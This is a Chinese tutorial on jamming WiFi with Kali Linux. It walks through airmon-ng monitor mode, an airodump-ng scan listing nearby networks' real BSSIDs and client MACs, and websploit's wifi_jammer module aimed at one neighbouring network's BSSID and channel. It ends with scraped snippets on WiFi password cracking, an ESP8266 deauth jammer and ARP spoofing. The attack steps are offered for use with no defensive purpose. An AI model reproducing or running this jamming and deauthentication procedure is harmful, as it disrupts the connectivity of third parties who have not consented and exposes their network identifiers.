kali下进行wifi干扰

首先启动混杂模式

ifconfig查看interface

airmon-ng start wlan0

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
2595    NetworkManager
2678    wpa_supplicant
3097    dhclient
7173    dhclient
7268    dhclient
Process with PID 7268 (dhclient) is running on interface wlan2
Process with PID 7173 (dhclient) is running on interface wlan0

Interface   Chipset     Driver

wlan2       Ralink 2573 USB rt73usb - [phy9]
wlan0       Atheros AR9285  ath9k - [phy0]
                (monitor mode enabled on mon0)

然后airodump mon0

看到一大堆wifi

 CH  5 ][ Elapsed: 12 s ][ 2015-02-20 11:26 ][ WPA handshake: D4:EE:07:1C:4B:92                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 70:3A:D8:11:46:E8  -86        3        0    0  11  54e. WPA  CCMP   PSK  llp
 C8:3A:35:50:5B:88  -88        3        0    0  10  54e  WPA  CCMP   PSK  Tenda_505B88
 62:89:E4:44:4A:76  -60       26        0    0   7  54e  WPA2 CCMP   PSK  USER_3004
 A0:89:E4:44:4A:75  -58       26        0    0   7  54e  OPN              <length:  6>
 D4:EE:07:1C:4B:92  -61       28        8    0   1  54e  WPA2 CCMP   PSK  HiWiFi_1C4B92
 6C:E8:73:F7:19:98  -64       18        1    0   6  54e. WPA2 CCMP   PSK  JaydanKuk
 50:BD:5F:19:A1:2D  -71       22        0    0   6  54e. WPA2 CCMP   PSK  TP-LINK_A12D
 80:89:17:11:A8:3F  -73        0        0    0   6  54e. WPA2 CCMP   PSK  ZLINFENG_Network
 08:10:77:8C:D7:9F  -82        2        0    0   6  54e  WPA2 CCMP   PSK  li3003
 58:87:E2:6D:F2:2C  -82       19        2    0   1  54e  OPN              Coship_6DF22C
 58:87:E2:1D:4A:D6  -84       12        0    0   1  54e  OPN              Coship_1D4AD6
 58:87:E2:6D:E8:6C  -85        9        0    0   1  54e  OPN              Coship_6DE86C
 80:89:17:56:D6:3D  -88        5        0    0  11  54e. WPA2 CCMP   PSK  2503
 58:87:E2:36:A5:30  -88       15        0    0   1  54e  WPA2 CCMP   PSK  Coship_3104
 A0:89:E4:31:BD:7C  -88       10        0    0   1  54e  OPN              <length:  6>
 64:09:80:08:79:37  -90       10        0    0   3  54e  WPA2 CCMP   PSK  cngugu
 6A:89:E4:31:BD:7D  -90       11        0    0   1  54e  WPA2 CCMP   PSK  USER_2802                                                   

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                            

 (not associated)   D4:97:0B:53:5D:57  -90    0 - 1      1        4
 (not associated)   44:33:4C:EE:1F:84  -92    0 - 1      0        2
 D4:EE:07:1C:4B:92  CC:AF:78:29:FD:9D    0    1e- 1      0      165  HiWiFi_1C4B92
 6C:E8:73:F7:19:98  04:1B:BA:3D:54:D4   -1    0e- 0      0        1      

打开另一个终端

启动websploit

[email protected]:~# websploit
WARNING: No route found for IPv6 destination :: (no default route?)

db   d8b   db d88888b d8888b. .d8888. d8888b. db       .d88b.  d888888b d888888b
88   I8I   88 88‘     88  `8D 88‘  YP 88  `8D 88      .8P  Y8.   `88‘   `~~88~~‘
88   I8I   88 88ooooo 88oooY‘ `8bo.   88oodD‘ 88      88    88    88       88
Y8   I8I   88 88~~~~~ 88~~~b.   `Y8b. 88~~~   88      88    88    88       88
`8b d8‘8b d8‘ 88.     88   8D db   8D 88      88booo. `8b  d8‘   .88.      88
 `8b8‘ `8d8‘  Y88888P Y8888P‘ `8888Y‘ 88      Y88888P  `Y88P‘  Y888888P    YP    

        --=[WebSploit FrameWork
    +---**---==[Version :2.0.5 BETA
    +---**---==[Codename :We‘re Not Crying Wolf
    +---**---==[Available Modules : 19
        --=[Update Date : [r2.0.5-000 2.3.2014]

输入use wifi/wifi_jammer

show options

然后设置频道,essid,bssid

就是用airodump-ng扫出来的那些

选择的自己目标

set bsssid 6C:E8:73:F7:19:98

set essid xxxxx

set channel 6

然后RUN

就会弹出几个终端,已经开始干扰了

good luck

时间: 2024-12-14 18:55:36

kali下进行wifi干扰的相关文章

Kali Linux下破解WIFI密码挂载usb无线网卡的方法

Kali Linux下破解WIFI密码挂载usb无线网卡的方法 时间:2014-10-12    来源:服务器之家    投稿:root 首先我要说的是,wifi密码的破解不是想象中的那么容易,目前还没有一个可以破解任意类型wifi密码的工具或者方案存在.虽然你可以在网络上找到大量的教程,教程中有大量的成功案例,但是在实际场景中成功率是极低的. 其次,免费的午餐并不都那么好吃,希望读者在自己的内网上进行测试,毕竟学习技术是第一位的.免费午餐有可能会增加你遭受钓鱼攻击的风险. 本系列文章会针对不同

邪恶改装:TPYBoard制作廉价WIFI干扰器

转载请注明:@小五义http://www.cnblogs.com/xiaowuyi 0X01 引言 想不想搞个WIFI干扰器?网上搜集了一下资料,发现用esp8266可以实现简单的干扰功能,包括断网.复制.欺骗等等.刚好手上有块Tpyboard V202(30元),也是esp8266芯片的,也是想换个固件是不是也可完成呢?周末动手试一下. 0X02 搭建开发环境 1.网上下载了一个使用esp8266制作Deauth无线攻击的开源固件,是arduino开发的. github下载地址:https:/

WiFi 干扰器,有时间可以去试试呦!

转自社区: 0X01 引言 想不想搞个WIFI干扰器?网上搜集了一下资料,发现用esp8266可以实现简单的干扰功能,包括断网.复制.欺骗等等.刚好手上有块Tpyboard V202(30元),也是esp8266芯片的,也是想换个固件是不是也可完成呢?周末动手试一下. 0X02 搭建开发环境 1.网上下载了一个使用esp8266制作Deauth无线攻击的开源固件,是arduino开发的. github下载地址:https://github.com/PakchoiFood/ESP8266_deau

使用 ESP8266 制作 WiFi 干扰器 - 无需密码即可使用任何 WiFi

嘿,朋友,我是 Kedar,你有没有想阻止所有的 WiFi信号?或者只是想从 WiFi 踢某人或邻居 WiFi .那么,本玩法是你等待结束的时刻了.这是为你提供的.仅需 $8 的 DIY Wifi 干扰器. 这个干扰器是如此微小,你可以放在口袋里,并随身携带.它可以通过您的电源或 3.7v 锂电池供电.你可以选择你想要的那个 WiFi网络,然后点击它. 但要确保这只是为了教育目的,而不要用于错误的目的. 802.11 WiFi 协议包含一个所谓的去认证帧(deauthentication fra

Kali下的内网劫持(四)

在前面我都演示的是在Kali下用命令行的形式将在目标主机上操作的用户的信息捕获的过程,那么接下来我将演示在Kali中用图形界面的ettercap对目标主机的用户进行会话劫持: 首先启动图形界面的ettercap: 接下来将嗅探方式修改为同意嗅探,且嗅探网卡为eth0: 接下来进行在同一局域网内的主机扫描: 可以看出扫描出的主机还不少: 添加目标主机: 添加路由: 接着进行ARP毒化: 开始嗅探之后选择连接的主机: 在目标主机上访问并登录某一页面: 那么在劫持断可以看到访问的网站以及登录的用户名和

Linux:Ubuntu16.04下创建Wifi热点

Linux:Ubuntu16.04下创建Wifi热点 说明: 1.Ubuntu16.04里面可以直接创建热点,而不用像以前的版本,还要其他辅助工具. 2.本篇文章转载自编程人生 具体步骤如下: 1. 点击网络标志,打开网络的选项: 2. 点击 Edit Connections ,然后点击 Add 来添加一个新的wifi选项: 3. 选择 WiFi : 4. 做如下编辑: 编辑wifi的名字:SSID, 选择 Hotspot (热点)模式. 在 Wifi Security 页, 选择 WPA &

Win7下设置WiFi热点

Win7下设置WiFi热点 今天研究了下Win7设置WIFI热点,Connectify神马的都是浮云~亲测可用,现拿出来分享下~ 1.点击"开始",再点击"运行",输入"cmd",回车,进入命令行: 2.在命令行下输入命令:"services.msc",弹出"服务"窗口,选择"Windows Firewall",右键点击"属性": 选择"手动",然

做一个WINDOWS下破解WIFI。不需要Linux抓包!

搬家了,没网了.没有WIFI了! 想破解,不过没有Linux环境,不能抓包!破解! 于是自己动手开工! 在windows 下直接破解.貌似国内 还没看到.如果有了,那么请各位童鞋 提醒一下.赶急 要使用啊!! 最终: 不过有点问题,如果路由器 启用混淆模式,那么如何拿到真实的握手协议呢? 做一个WINDOWS下破解WIFI.不需要Linux抓包!

Kali下进行局域网断网攻击

今天我就来演示一下在kali下的局域网断网攻击,即ARP地址欺骗,下图所要用到的arp地址欺骗状态图: 则: 第一步:假设主机A访问某网站,那么要告知某网站我的IP和MAC地址,但这是以广播的方式告知的: 第二步,由于是广播方式告知,猥琐的B主机也知道了A的IP和Mac地址,于是猥琐的B主机把自己伪装成某网站,给A发送回复,A误以为B就是某网站,因此更新了自己本机的ARP缓存: 第三步,两者建立连接,A不断将自己的请求发给B,可怜的某网站被挂在一遍了.如果B又把自己伪装成主机A,从而转发A的请求